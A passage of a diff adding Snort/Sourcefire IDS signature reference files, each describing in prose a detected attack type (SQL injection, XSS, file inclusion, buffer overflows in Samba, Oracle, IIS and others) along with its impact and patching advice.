+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "printarticle.php" script used by 
+the "thinkWMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using thinkWMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2353.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2353
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application IdeaBox.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+IdeaBox contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable ideaDir when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file cord.php.
+
+--
+Affected Systems:
+	PHPOutsourcing IdeaBox 1.0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the ideaDir variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000528.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000528
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PHPMyForum" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "highlight" parameter in the "topic.php" script 
+used by the "PHPMyForum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyForum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2154.txt
@@ -0,0 +1,60 @@
+Rule:
+
+
+--
+Sid:
+2154
+
+--
+Summary:
+This event is generated when a remote user attempts to access autohtml.php on a web server. This may indicate an attempt to exploit a  vulnerability in PHP-Proxima, a web site portal application.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the autohtml.php script within PHP-Proxima. An attacker can use directory traversal techniques when accessing autohtml.php to view hidden files and directories on the web server with the access privileges of the server. In addition, an attacker can enter an arbitrary file name within the "name" parameter of the autohtml.php call, and if the file exists, the attacker can view it.
+
+--
+Affected Systems:
+Any server running PHP-Proxima.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques or use a specific filename in the "name" parameter of the URL when executing autohtml.php to view specific directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses autohtml.php, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Comment out or remove the "include("autohtml/$name");" line from the autohtml.php script.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7598
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11630
+
+--
--- /dev/null
+++ b/doc/signatures/689.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/863.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+863
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2168.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2168
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1015.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1015
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000360.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000360
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "drucken2.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "drucken2.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/911.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+911
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000542.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000542
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "mem.php" with SQL commands being passed as the "mid" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "mid" parameter in the "mem.php" script used by the 
+"Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1118.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1118
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3059.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3059
+
+--
+Summary:
+This event is generated when an attempt is made to initiate a TLS
+connection via SSL version 2.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule indicates that an attempt has been made to initiate a TLS
+connection via SSL v2. This rule should not generate an event.
+
+--
+Affected Systems:
+	All implementations using SSL.
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2598.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2598
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in the Samba Web Administration Tool (SWAT).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in SWAT that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an the functions that handle base64 decoding
+during HTTP basic authentication. Exploitation of this vulnerability
+may present the attacker with the opportunity to gain control of the
+affected system.
+
+--
+Affected Systems:
+	 Versions of Samba greater than or equal to 3.0.2 and
+     less than 3.0.5
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the SWAT
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600
+
+Bugtraq:
+http://www.securityfocus.com/bid/10780
+
+--
--- /dev/null
+++ b/doc/signatures/2556.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2556
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1259.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1259
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1039.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+1039
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+This event is generated when an attempt is made to access a sample 
+application on a Microsoft IIS server. In this case the sample search 
+functionality. This application may present an attacker with the 
+opportunity to gain valuable information regarding the implemenation of 
+IIS on the affected host.
+
+--
+Affected Systems:
+	Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+Delete or disable access to any sample applications on the host.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/support/kb/articles/Q188/2/57.ASP&NoWebContent=1
+
+--
--- /dev/null
+++ b/doc/signatures/3314.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3314
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3027.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3027
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-4.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-4
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that indicates
+data has been found outside the expected window for the data in a session.
+
+This is not normal network behavior and may indicate spurious activity
+or a malfunctioning operating system network stack.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+
+-- 
+Ease of Attack: 
+Simple. Many automated packet generation tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2668.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+2668
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+processit.pl.
+
+-- 
+Impact: 
+Information Disclosure.
+
+--
+Detailed Information:
+The script processit.pl returns envirnoment variables used by the server
+hosting the application. This can divulge information valuable to an
+attacker that can be used in further attacks against the host.
+
+--
+Affected Systems:
+	All systems using processit.pl
+
+--
+Attack Scenarios: 
+An attacker can retrieve environment variables by accessing the script
+processit.pl, these can be used in further attacks against the system.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script processit.pl
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/957.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+957
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2837.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2837
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
